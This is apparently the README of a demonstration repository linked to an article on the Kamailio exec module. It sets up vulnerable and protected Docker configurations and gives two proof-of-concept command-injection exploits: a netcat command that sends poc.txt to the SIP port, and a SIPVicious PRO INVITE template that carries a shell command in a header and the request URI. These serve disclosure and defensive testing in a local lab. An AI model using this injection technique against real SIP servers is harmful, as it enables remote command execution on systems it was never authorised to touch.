Kamailio exec module examples
This repository includes examples referenced from https://www.rtcsec.com/article/kamailio-exec-module-considered-harmful.
Note: depending on your Docker setup, you might need to use the command docker compose instead of docker-compose.
Starting Kamailio
To run the vulnerable version of the Kamailio configuration:
docker-compose run kamailio-vulnerableTo run the protected version:
docker-compose run kamailio-protectedExploitation
We give two examples for exploitation, one making use of netcat and the other uses SIPVicious PRO which is commercially available.
Netcat PoC
-
Start monitoring the
/tmpdirectory:docker-compose exec kamailio-vulnerable watch ls -alh /tmp -
To run the PoC use the following instruction:
cat poc.txt | nc 127.0.0.1 5060 -
Observe the result in the directory listing
SIPVicious PRO PoC
When making use of the stable version of SIPVicious PRO, one may use the repeater tool to reproduce this issue as follows:
-
Save the following template as
inviterequest.tpl(or switch to thesvprodirectory in this repository):INVITE sip:`$SIP_HF_COMMAND`@127.0.0.1 SIP/2.0 Command: {{ ENV "COMMAND" }} Via: SIP/2.0/{{.AddrFamily}} {{.LocalAddr}};rport;branch=z9hG4bK-{{.Branch}} Max-Forwards: 70 From: {{.FromVal}} To: {{.ToVal}} Call-ID: {{.CallID}} CSeq: {{.CSeq}} INVITE Contact: {{.ContactVal}} Content-Length: {{.Body | len}} Content-Type: application/sdp {{.Body -}} -
Start monitoring the
/tmpdirectory:docker-compose exec kamailio-vulnerable watch ls -alh /tmp -
Run the PoC as follows:
COMMAND="touch /tmp/pwned" sipvicious sip utils repeater udp://127.0.0.1:5060 -m invite -
Observe the result in the directory listing
One may also make use of a new experimental tool called iterator which can act like a scanner or fuzzer to identify this vulnerability semi-automatically.
Build
The image is already available on the Docker registry. If you would like to build it, you may do so as follows:
docker-compose build